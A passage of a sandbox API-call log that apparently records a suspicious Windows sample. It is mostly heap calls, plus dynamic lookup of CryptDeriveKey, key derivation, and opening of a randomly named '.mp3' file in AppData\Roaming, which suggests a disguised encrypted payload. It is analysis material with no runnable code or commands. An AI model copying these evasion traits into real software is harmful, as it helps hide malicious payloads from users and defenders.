Flags=0x0, Size=0x8) returned 0x2e55108 [0229.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0229.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0229.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0229.747] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0229.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0229.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0229.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0229.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0229.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0229.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0229.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0229.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0229.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0229.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0229.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0229.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0229.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0229.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0229.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0229.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0229.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0229.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.751] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0229.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0229.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0229.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0229.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0229.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0229.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0229.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0229.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0229.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0229.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0229.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0229.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0229.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0229.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0229.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0229.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0229.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0229.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0229.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0229.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0229.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0229.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0229.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0229.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0229.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0229.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0229.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0229.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0229.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0229.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0229.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0229.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0229.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0229.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0229.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0229.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0229.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0229.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0229.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51580 [0229.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51580, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0229.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0229.755] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0229.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0229.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0229.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0229.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0229.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0229.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0229.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0229.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0229.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0229.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0229.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0229.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0229.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0229.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0229.755] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87610, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa86f90) returned 1 [0229.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0229.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0229.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0229.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0229.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0229.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0229.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0229.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0229.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0229.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0229.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0229.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0229.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0229.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0229.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0229.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0229.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0229.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0229.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0229.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0229.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0229.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0229.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0229.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0229.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0229.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0229.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0229.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0229.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0229.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0229.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0229.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0229.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0229.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0229.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0229.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0229.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0229.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0229.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0229.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0229.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0229.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0229.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0229.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0229.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0229.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0229.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0229.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0229.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0229.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0229.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0229.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0229.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0229.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0229.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0229.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0229.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0229.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0229.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0229.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0229.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0229.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0229.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0229.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0229.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0229.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0229.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0229.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0229.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0229.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0229.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0229.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0229.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0229.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0229.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0229.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0229.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0229.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0229.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0229.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0229.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0229.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0229.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0229.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0229.760] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0229.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0229.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0229.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0229.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0229.760] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.760] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0229.760] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0229.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0229.761] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0229.761] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0229.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0229.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0229.761] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0229.761] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0229.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0229.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0229.761] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0229.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0229.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0229.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0229.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0229.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0229.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e699c8 [0229.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e699c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0229.762] CryptDestroyHash (hHash=0xa87610) returned 1 [0229.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0229.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0229.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0229.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0229.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0229.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0229.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0229.762] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0229.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0229.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0229.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0229.763] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0229.763] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.763] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.763] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0229.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0229.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0229.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0229.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0229.764] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/eeVXHty18.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\eevxhty18.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0229.764] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0229.764] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0229.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0229.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0229.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0229.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0229.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0229.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0229.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0229.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0229.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0229.765] PeekMessageW (in: 